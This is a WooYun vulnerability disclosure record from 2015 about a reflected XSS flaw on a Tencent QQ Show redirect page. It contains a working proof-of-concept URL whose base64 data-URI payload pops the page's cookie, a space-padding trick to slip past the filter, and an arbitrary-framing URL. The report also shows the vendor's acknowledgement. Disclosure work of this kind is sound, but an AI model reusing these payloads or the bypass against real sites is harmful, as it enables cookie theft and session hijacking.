漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0165988
漏洞标题:腾讯某站XSS跨站可打cookies
相关厂商:腾讯
漏洞作者: thx
提交时间:2015-12-30 11:56
修复时间:2016-02-12 18:49
公开时间:2016-02-12 18:49
漏洞类型:XSS 跨站脚本攻击
危害等级:低
自评Rank:1
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-12-30: 细节已通知厂商并且等待厂商处理中
2015-12-30: 厂商已经确认,细节仅向厂商公开
2016-01-09: 细节向核心白帽子及相关领域专家公开
2016-01-19: 细节向普通白帽子公开
2016-01-29: 细节向实习白帽子公开
2016-02-12: 细节向公众公开
简要描述:
麻烦验证的时候能刷新几次,知道管理很忙,不可能都细看,但菜鸟对找到的漏洞有多重视你可能想像不到。
详细说明:
如果提示501,请刷新一下,第一次打开提示501真不知道为什么...
仅对firefox有效,效果: http://imgcache.qq.com/qqshow_v3/htdocs/live/yaohe/jumppage.html?url=data:text/html%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==
框架调用:http://qz6666.com/1.html
漏洞处源码:
QSFL.excore.getURLParam没找到,应该是对data:text/html;base64过滤不完善,多加几个空格就绕过了。
另附一个任意框架,暂时不知道怎么利用:
http://show.qq.com/show_v3.html?MUrl=/../../qqshow_v3/htdocs/live/yaohe/jumppage.html%3furl%3dhttp://www.baidu.com
漏洞证明:
如果提示501,请刷新一下,第一次打开提示501真不知道为什么...
http://imgcache.qq.com/qqshow_v3/htdocs/live/yaohe/jumppage.html?url=data:text/html%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==
框架调用:http://qz6666.com/1.html
修复方案:
版权声明:转载请注明来源 thx@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:5
确认时间:2015-12-30 16:16
厂商回复:
非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。
最新状态:
暂无